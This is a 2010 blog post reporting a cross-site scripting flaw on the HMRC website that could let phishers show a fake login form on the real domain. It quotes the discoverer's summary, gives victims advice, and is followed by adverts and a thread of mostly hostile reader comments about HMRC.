Thursday 18 November 2010

Gone Phishing



My thanks to a loyal reader who sent me a link to an article about a potential security flaw within the HMRC website, that may allow phishers to harvest personal information from the unwary user.

Here is a summary of the issue from Concept Business Systems (who also put together the video above):

Summary:
A potentially dangerous cross site scripting vulnerability has been discovered on Her Majesty's Customs & Excise web site.

Description:
This exploit allows anyone to alter content shown on the HMRC.gov.uk search site.

As we've shown below, it's possible to change any part of the site. If exploited, a fraudster could potentially gain access to user accounts by forwarding a malicious link by email, web forum or chat message. HMRC are a prime target for phishing scams, but success rates are limited for a number of reasons. The main problem fraudsters face is trying to convince their victims that the site (and email) is genuine. Quite often, it's simple grammatical / spelling mistakes which give the game away. Unfortunately, some scams are very well executed and can fool even the most careful users.

All phishing scams are dangerous, but this is no ordinary phishing scam and it stands out for a two reasons.

1. It's a very high profile site.
2. The fraudster no longer needs to clone the site, these changes can be made to the genuine site... thus hiding the scam behind the correct URL (www.hmrc.gov.uk) and giving the user a false sense of security.

In the video below, we've altered the content and replaced it with a message asking the user to login in order to perform a tailored search. This message and the form beneath are fake; created purely to collect your username & password. These details are not sent to HMRC's server and are therefore not covered by their SSL certificate (the padlock symbol). Instead, they are forwarded to an address of the hackers choice.

With phishing scams & identity theft a real cause for concern, this needs to be resolved as a matter of urgency.

If you suspect you've been a victim of such a scam, it's absolutely vital that you change your password as soon as possible, particularly if you're an agent acting on behalf of other clients.

Also, email security.custcon@hmrc.gsi.gov.uk This e-mail address is being protected from spambots. You need JavaScript enabled to view it.

DO NOT disclose any personal details in your email... simply outline the type of information you disclosed and to whom.

Tax does have to be taxing.

Professional Cover Against the Threat of Costly TAX and VAT Investigations

What is TAXWISE?

TAXWISE is a tax-fee protection service that will pay up to £75,000 towards your accountant's fees in the event of an HM Revenue & Customs full enquiry or dispute.

To find out more, please use this link Taxwise

Tax Investigation for Dummies, by Nick Morgan, provides a good and easy to read guide for anyone caught up in an HMRC tax investigation. A must read for any Self Assessment taxpayer.

Click the link to read about: Tax Investigation for Dummies

HMRC Is Shite (www.hmrcisshite.com), also available via the domain www.hmrconline.com, is brought to you by www.kenfrost.com "The Living Brand"

15 comments:

  1. The tell tail sign that you've been directed to a fraudsters site, rather than the real HMRC site, is that the site doesn't crash.

    At least the fraudsters will take less money from your bank account.

    ReplyDelete
  2. 15:34 Haha, if wit were shit you'd be constipated.

    ReplyDelete
  3. fraudsters or HMRC - whats the difference?

    ReplyDelete
  4. I am not sure this is what "Sharing Resources" means.

    ReplyDelete
  5. 15:34 Haha, if wit were shit you'd be constipated.

    Well yeah! I guess HMRC would know all about constipation wouldn't they. With their superb system and staff where all the information goes in and nothing comes out for 4/5 years. Thats why there are a third of the working population receiving tax coding notices caused by HMRC errors.

    ReplyDelete
  6. If there is one thing that HMRC is not, it is constipated.

    ReplyDelete
  7. 7.37 The revenue ate my hamster.

    ReplyDelete
  8. So all errors are HMRC's fault? I think not, for example:
    2 callers today have had sizeable underpayments because they had multiple jobs, never completed a p46 and the employer never set up and employment record. Result- Multiple Allowances, Fault- Employer and individual.
    1 caller had an underpayments because they had company car and fuel which nor they or employer informed us of. Result- Untaxed benefits, Fault- Employer and individual.
    1 caller had an underpayment because no State Pension was coded. We had not received the info from the DWP so sent a P161 to the.person to get the figures... they never responded 'didn't see why I had to'. Result- More allowances on private.sources than due, Fault- Individual.
    In the last two.weeks I have seen no underpayments due to HMRC, if I do I tell them.

    ReplyDelete
  9. So all errors are HMRC's fault? I think not, for example:
    2 callers today...

    You have been living in cave, be totally naive newby member of staff, or a total brownnose. Probably all three.
    I speak as one of the (estimated)1.8 million who have received, or will recieve a bill for underpayment going back to 2006/07 and where I have never had any other income other than employment plus pension, both through PAYE (both long standing and from civil service sources)
    I have been dumped on by the bunch of totally incompetant bastards at HMRC, who dont even have the grace to admit they got it wrong.

    ReplyDelete
  10. You have been living in cave, be totally naive newby member of staff, or a total brownnose. Probably all three.

    So the previous poster highlighted 4 cases, with detailed explanations, that were not HMRCs fault. You have identified 1 case, without details, that you say was HMRCs fault. That still doesn't back up the claim that all errors are HMRCs fault.

    If it makes you feel any better you are unlikely to receive a bill going back to 06-07 if it is all under PAYE.

    http://www.publications.parliament.uk/pa/cm201011/cmselect/cmpubacc/uc502-ii/uc50201.htm

    ReplyDelete
  11. Anon @ 19 November 2010 11:29, I think you sum up HMRC's attitude fairly well. This thread is about website security and you are yapping on about who's fault it is that someones tax is not in order. Maybe if you concentrated on the actual issue being discussed you input would be more valid.

    ReplyDelete
  12. I was esponding to 7:37 and making a valid point to his/her mis informed statement. The whole thread and comments are again HMRC badhing. HMRC did not design the website, how many issues do Microsoft have and they are a computer company?
    Perhaps if you were less arrogant your objection to my comments would be more valid.

    ReplyDelete
  13. I was esponding to 7:37 and making a valid point to his/her mis informed statement.
    Shame on 7:37 for causing this trouble.

    The whole thread and comments are again HMRC badhing.
    I think you will find that most of this site does that. It is why it exists.

    HMRC did not design the website
    Lame excuses usual.

    How many issues do Microsoft have and they are a computer company?
    I use a mac so could not care less.

    Perhaps if you were less arrogant your objection to my comments would be more valid.
    Probably correct but who gives a toss.

    ReplyDelete
  14. Wow you have torn apart my statement and humbled me with your decisively eloquent points.

    ReplyDelete
  15. At least the fraudsters will take less money from your bank account.

    And undoubtedly wil be less arsy and arrogant in any exchanges they have with you. Never mind, role on the next staff survey results (which HMRC will no doubt try not to publish again). We can then all see what a bunch of jobsworth twats we are all supporting with our taxes.

    ReplyDelete